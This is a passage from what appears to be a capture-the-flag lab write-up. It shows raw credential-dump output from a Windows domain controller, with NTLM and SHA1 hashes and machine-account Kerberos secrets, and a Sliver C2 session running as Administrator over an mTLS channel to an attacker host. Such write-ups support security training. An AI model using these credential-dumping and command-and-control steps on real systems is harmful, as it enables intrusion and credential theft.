         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 381075 (00000000:0005d093)
Session           : Interactive from 1
User Name         : cyork
Domain            : MEGACORP
Logon Server      : MULTIMASTER
Logon Time        : 1/22/2024 10:29:55 PM
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
        msv :
         [00000003] Primary
         * Username : cyork
         * Domain   : MEGACORP
         * NTLM     : 06327297532725a64e1edec0aad81cfe
         * SHA1     : 56380d6f034d060faca78ae4dc90842bbfc5ffe1
         * DPAPI    : 562c87ff69e458a64559c5a718700f43
        tspkg :
        wdigest :
         * Username : cyork
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : cyork
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:20 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 145363 (00000000:000237d3)
Session           : Service from 0
User Name         : SQLTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 1/22/2024 10:29:19 PM
SID               : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : 6e 4f 77 d9 71 28 b9 a6 26 8b 59 aa b5 bf 6f 79 b4 af fe c0 c3 55 80 fd a3 d5 79 cd e0 51 d2 a7 32 60 10 cc 08 8e fe e3 17 d2 88 92 a3 6e a1 33 2a cb 33 99 6a b3 69 d0 25 dc 17 d0 64 aa 88 ed a9 f1 4d 23 3c 24 95 8d a3 95 34 ce 06 37 e2 12 5c 24 7a 0d 2c cb 85 51 04 0b 7b e9 6a df 1f c0 08 5b 48 7b 2f 95 3a 65 bf 94 7d f6 da ae e2 97 f7 6e b2 28 0b b7 fd 31 c0 51 58 0b 18 ee 11 7f 46 71 79 27 02 d8 7e b4 6f 45 98 e9 b5 44 67 c1 da b0 6d 49 41 5b 07 46 dc 60 40 4e cf f6 11 f9 0b 76 92 f9 40 9e f9 50 35 a5 af 0e 03 30 28 5e 25 62 fc b5 67 31 c7 eb c7 1e 96 4e 35 83 53 fe e1 e1 1a a5 88 d6 87 33 b0 48 22 5d bc d0 8c 7a 80 0f 6f a0 57 74 91 91 da a8 26 e6 ae a6 e7 6b d7 8b 54 1e 51 01 3a d9 54 e1 88 4c f9 53 de f8 
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 69747 (00000000:00011073)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:53 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 289fcbb2f2a91035588e3f090e0a5798
         * SHA1     : 74600e570585ceda3ce2b5a6b692ee76c79affd9
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP.LOCAL
         * Password : e3 46 5f c2 15 01 2a ad 9b 1f 7e 0b 37 00 19 bf 52 da 56 b1 c2 0b 5e 7d 00 74 2b 65 c3 4e e3 71 22 b1 4a 4e 9e 00 fd 6d 7a 46 73 80 fc 0b 8b 50 60 09 78 ac 3f 22 07 93 00 98 da 9d 62 c8 78 0b 6d 94 07 4d ec 27 d0 70 ac e5 e0 1c f6 07 19 d5 bd 83 fc 59 f2 b0 a0 89 48 28 64 f7 cd 0f 0e 60 b1 bf 81 2a 20 f4 9e 07 6a 5e e1 23 cd 26 13 c4 30 fe a3 60 e7 36 7a f1 21 fb 1d 41 56 33 2b 01 a1 80 e5 09 fe 8a 1f f6 00 d4 9d 00 09 64 ca d4 24 c0 4e a9 f7 00 58 f5 6e 01 cf 84 bf 9b 0b 24 0d fb 7b c9 1f 33 a2 1a bb c3 cd 4a f1 c7 07 67 53 55 94 39 f1 a5 e5 6b f6 60 c2 b3 d2 d1 88 fc f8 c6 eb 1e 86 20 17 2b 87 a1 95 10 fc bd 35 ea 2f ee 76 2a dc 2c 2e bd 31 1e e7 a5 a3 29 b9 4d 1c 6d d1 c3 83 03 1c 89 59 d0 47 a5 e2 88 31 13 
        ssp :
        credman :

Authentication Id : 0 ; 38349 (00000000:000095cd)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:51 PM
SID               : 
        msv :
         [00000003] Primary
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * NTLM     : 1a33fc88fa08d631779a310a53aa7deb
         * SHA1     : 7b66dada748d8246c1972cfb5afeb45d11531aa6
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : MULTIMASTER$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 1/22/2024 10:28:51 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : MULTIMASTER$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : multimaster$
         * Domain   : MEGACORP.LOCAL
         * Password : (null)
        ssp :
        credman :

For sparks, here's more about sliver:

[server] sliver (NATIONAL_CLIENT) > info

        Session ID: 0ce336ed-107a-4751-996d-a0f2863d60f1
              Name: NATIONAL_CLIENT
          Hostname: MULTIMASTER
              UUID: b7b71442-64b0-d608-d6b6-97dee6f3be99
          Username: MEGACORP\Administrator
               UID: S-1-5-21-3167813660-1240564177-918740779-500
               GID: S-1-5-21-3167813660-1240564177-918740779-513
               PID: 2352
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.10.14.40:9001
    Remote Address: 10.129.95.200:49843
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Fri Jan 23 06:46:29 UTC 2024 (4m39s ago)
      Last Checkin: Fri Jan 23 06:50:54 UTC 2024 (14s ago)

[server] sliver (NATIONAL_CLIENT) > screenshot

[*] Screenshot written to /tmp/screenshot_MULTIMASTER_20240123065112_1223947272.png (0 B)

I think this is enough sliver for today.

Moreover, Proton me folks if you have further question and suggestion.

Happy hacking!

Go Top